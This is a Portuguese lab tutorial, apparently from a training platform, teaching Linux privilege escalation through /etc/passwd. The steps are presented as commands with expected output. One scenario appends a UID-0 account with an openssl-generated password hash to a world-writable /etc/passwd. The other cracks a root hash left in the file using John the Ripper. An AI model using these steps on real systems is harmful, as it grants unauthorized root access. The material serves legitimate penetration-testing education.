Explore Escalonamento de Privilégios via Arquivo /etc/passwd no Nmap

Introdução

Os arquivos /etc/passwd e /etc/shadow são cruciais para a autenticação de usuários em sistemas Linux. Se os administradores de sistema configurarem incorretamente o conteúdo ou as permissões desses arquivos, isso pode levar a vulnerabilidades de escalonamento de privilégios. Neste laboratório, exploraremos métodos para escalonamento de privilégios explorando o arquivo /etc/passwd.

Entendendo o Arquivo /etc/passwd

Nesta etapa, exploraremos a estrutura e o significado do arquivo /etc/passwd.

Em sistemas Linux, as informações de senha do usuário são armazenadas em dois arquivos: /etc/passwd e /etc/shadow. O arquivo /etc/passwd contém informações do usuário, com cada linha representando uma única conta de usuário. Cada linha é dividida em sete campos separados por dois pontos:

• Nome de usuário (Username)
• Senha (se definida como x, a senha é armazenada em /etc/shadow)
• ID do usuário (UID, 0 para o usuário root)
• ID do grupo (GID)
• Informações do usuário (Nome completo, Número da sala, Telefone do trabalho, Telefone residencial e Outros)
• Diretório home
• Shell padrão

Agora, abra um terminal e navegue até o diretório /home/labex/project para prosseguir para a próxima etapa.

cd /home/labex/project

Obtenha as informações do usuário labex do arquivo /etc/passwd e salve-as em um arquivo chamado labex_passwd.txt no diretório /home/labex/project.

grep labex /etc/passwd > /home/labex/project/labex_passwd.txt

Verifique o conteúdo do arquivo labex_passwd.txt.

cat labex_passwd.txt

Saída esperada:

labex:x:5000:5000::/home/labex:/usr/bin/zsh

Aqui está o que cada campo representa:

• Nome de usuário: labex
• Senha: armazenada em /etc/shadow (indicado por x)
• UID: 5000
• GID: 5000
• Informações do usuário: Neste caso, está vazio
• Diretório home: /home/labex
• Shell padrão: /usr/bin/zsh

Durante o processo de autenticação Linux, as seguintes etapas ocorrem:

1. O nome de usuário inserido é verificado em relação ao primeiro campo em cada linha do arquivo /etc/passwd.
2. Se uma correspondência for encontrada, a senha no segundo campo é comparada.
3. Após a autenticação bem-sucedida, as permissões do usuário são determinadas pelo UID (terceiro campo) e GID (quarto campo).
4. Importante, um UID de 0 representa o usuário root, concedendo privilégios administrativos completos, independentemente do nome de usuário.

Como você pode ver, o arquivo /etc/passwd desempenha um papel crucial no processo de autenticação Linux. Se um invasor puder modificar este arquivo, ele poderá obter acesso não autorizado e escalar seus privilégios.

Escalonamento de Privilégios via /etc/passwd (Acesso de Escrita)

Nesta etapa, aprenderemos como escalar privilégios explorando o acesso de escrita ao arquivo /etc/passwd.

1. Primeiro, vamos configurar o ambiente do laboratório. Abra um terminal e navegue até o diretório /home/labex/project:

   cd /home/labex/project

   execute o seguinte comando para configurar o ambiente do laboratório:

   ./env_setup1.sh

   Este comando executará um script que configura o ambiente do laboratório. Você deve ver uma saída indicando que o ambiente está pronto.

2. Após a configuração, você estará logado como o usuário user001, simulando um acesso inicial ao shell obtido durante um teste de penetração.

   Navegue até o diretório home do usuário user001:

   cd ~

   Use o comando whoami para verificar seu usuário atual:

   whoami

   Saída esperada:

   user001

   Use o comando id para visualizar seus IDs de usuário e grupo:

   id

   Saída esperada:

   uid=1001(user001) gid=1001(user001) groups=1001(user001)

   Como você pode ver, você é um usuário normal sem nenhum privilégio especial.

3. Em seguida, verifique as permissões dos arquivos /etc/passwd e /etc/shadow:

   ls -l /etc/passwd /etc/shadow

   Saída esperada:

   --wx--xrwx 1 root root    1961 Apr  5 00:21 /etc/passwd
   -rw-r----- 1 root user001 1101 Apr  5 00:21 /etc/shadow

   Observe que o arquivo /etc/passwd tem permissões de execução e escrita para todos os usuários (--wx--xrwx), o que é uma configuração incorreta pelo administrador do sistema.

Nosso objetivo é criar uma nova entrada de usuário no arquivo /etc/passwd com um nome de usuário, senha e um UID de 0 (root) personalizados. Isso nos permitirá fazer login como o usuário root.

1. Primeiro, vamos examinar o formato da entrada do usuário root no arquivo /etc/passwd extraindo-a para um novo arquivo chamado new_user_entry.txt:

   cat /etc/passwd | grep root > new_user_entry.txt

   Saída esperada quando você usa o comando cat para visualizar o conteúdo do arquivo new_user_entry.txt:

   root:x:0:0:root:/root:/bin/bash

2. Para criar nossa própria entrada, altere o nome de usuário de root para qualquer nome desejado, como new-user no arquivo new_user_entry.txt:

   new-user:x:0:0:root:/root:/bin/bash

3. Substitua o x no segundo campo pelo hash da senha criptografada. Podemos usar a ferramenta openssl para gerar o hash para uma senha (por exemplo, pass123):

   openssl passwd -1 -salt ignite pass123

   Saída esperada:

   $1$ignite$3eTbJm98O9Hz.k1NTdNxe1

   Substituindo o hash no segundo campo no arquivo new_user_entry.txt:

   new-user:$1$ignite$3eTbJm98O9Hz.k1NTdNxe1:0:0:root:/root:/bin/bash

4. Agora, anexe esta linha ao arquivo /etc/passwd:

   echo "$(cat new_user_entry.txt)" >> /etc/passwd

   Observação: Podemos anexar a nova entrada ao arquivo /etc/passwd porque ele tem permissões de escrita para todos os usuários. Em um cenário do mundo real, este arquivo não deve ter permissões de escrita para usuários regulares.

5. Verifique a nova entrada pesquisando por new-user no arquivo /etc/passwd:

   cat /etc/passwd | grep new-user

   Saída esperada:

   new-user:$1$ignite$3eTbJm98O9Hz.k1NTdNxe1:0:0:root:/root:/bin/bash

6. Finalmente, mude para o usuário new-user com a senha pass123:

   su new-user

   Digite a senha pass123 quando solicitado. Agora você deve ter privilégios de root, conforme indicado pela mudança no prompt:

   user001@660ecfa4d7612c798ef141ab:~$ su new-user
   Password:
   root@660ecfa4d7612c798ef141ab:/home/user001#

Escalonamento de Privilégios via /etc/passwd (Hash de Senha)

Nesta etapa, aprenderemos como escalar privilégios quando o hash da senha do usuário root é armazenado no arquivo /etc/passwd em vez do arquivo /etc/shadow.

1. Primeiro, vamos configurar o ambiente do laboratório. Abra um terminal e navegue até o diretório /home/labex/project:

   Se você ainda estiver como new-user, pode usar o comando exit para sair do shell atual até chegar ao shell labex, e então navegar até o diretório /home/labex/project:

   cd /home/labex/project

   Execute o seguinte comando para configurar o ambiente do laboratório:

   ./env_setup2.sh

   Este comando executará um script que configura o ambiente do laboratório. Você deve ver uma saída indicando que o ambiente está pronto.

2. Após a configuração, você estará logado como o usuário user001, simulando um acesso inicial ao shell obtido durante um teste de penetração.

   Navegue até o diretório home do usuário user001:

   cd ~

3. Verifique as permissões dos arquivos /etc/passwd e /etc/shadow:

   ls -l /etc/passwd /etc/shadow

   -rw-r--r-- 1 root root 2059 Apr  5 01:36 /etc/passwd
   -rw-r----- 1 root root 1101 Apr  5 00:21 /etc/shadow

   Desta vez, as permissões do arquivo estão configuradas corretamente, e você só tem acesso de leitura ao arquivo /etc/passwd.

4. Visualize o conteúdo do arquivo /etc/passwd para encontrar o hash da senha do usuário root:

   cat /etc/passwd | grep ^root > ~/hash.txt

   Verifique o conteúdo do arquivo hash.txt executando o seguinte comando:

   cat ~/hash.txt

   Saída esperada:

   root:$1$ignite$J98A8EVPG1O40.WnwrPEM1:0:0:root:/root:/bin/bash

   Observe que o hash da senha do usuário root é armazenado no segundo campo do arquivo /etc/passwd. Este é geralmente o resultado de uma comprometimento anterior do sistema ou configuração incorreta pelo administrador do sistema.

5. Agora, execute john para quebrar o hash:

   john ~/hash.txt > ~/cracked.txt

   john é uma ferramenta popular de quebra de senhas que usa ataques de dicionário para quebrar hashes de senhas. A saída indicará se a senha foi quebrada com sucesso.

   Created directory: /home/user001/.john
   Will run 2 OpenMP threads
   Press 'q' or Ctrl-C to abort, almost any other key for status
   1g 0:00:00:00 100% 2/3 5.000g/s 6680p/s 6680c/s 6680C/s 123456..crawford
   Use the "--show" option to display all of the cracked passwords reliably
   Session completed

   Verifique o conteúdo do arquivo cracked.txt para visualizar a senha quebrada:

   Loaded 1 password hash (md5crypt [MD5 32/64 X2])
   hello            (root)

   Como você pode ver, john quebrou com sucesso a senha, que é hello.

6. Use o comando su para mudar para o usuário root, inserindo a senha quebrada quando solicitado:

   su root

   Digite a senha hello quando solicitado. Agora você deve ter privilégios de root, conforme indicado pela mudança no prompt de comando.

   user001@660ecfa4d7612c798ef141ab:~$ su root
   Password:
   root@660ecfa4d7612c798ef141ab:/home/user001#

Resumo

Neste laboratório, aprendemos sobre o processo de autenticação de usuário Linux, a importância do arquivo /etc/passwd e como explorá-lo para escalonamento de privilégios. Cobrimos dois cenários: (1) quando o arquivo /etc/passwd tem permissões de escrita, permitindo-nos criar uma nova entrada de usuário com privilégios de root, e (2) quando o hash da senha do usuário root é armazenado no arquivo /etc/passwd, permitindo-nos quebrar a senha usando a ferramenta john. Por meio da prática, obtivemos uma compreensão mais profunda de como aproveitar configurações incorretas no arquivo /etc/passwd para escalar privilégios em um sistema Linux.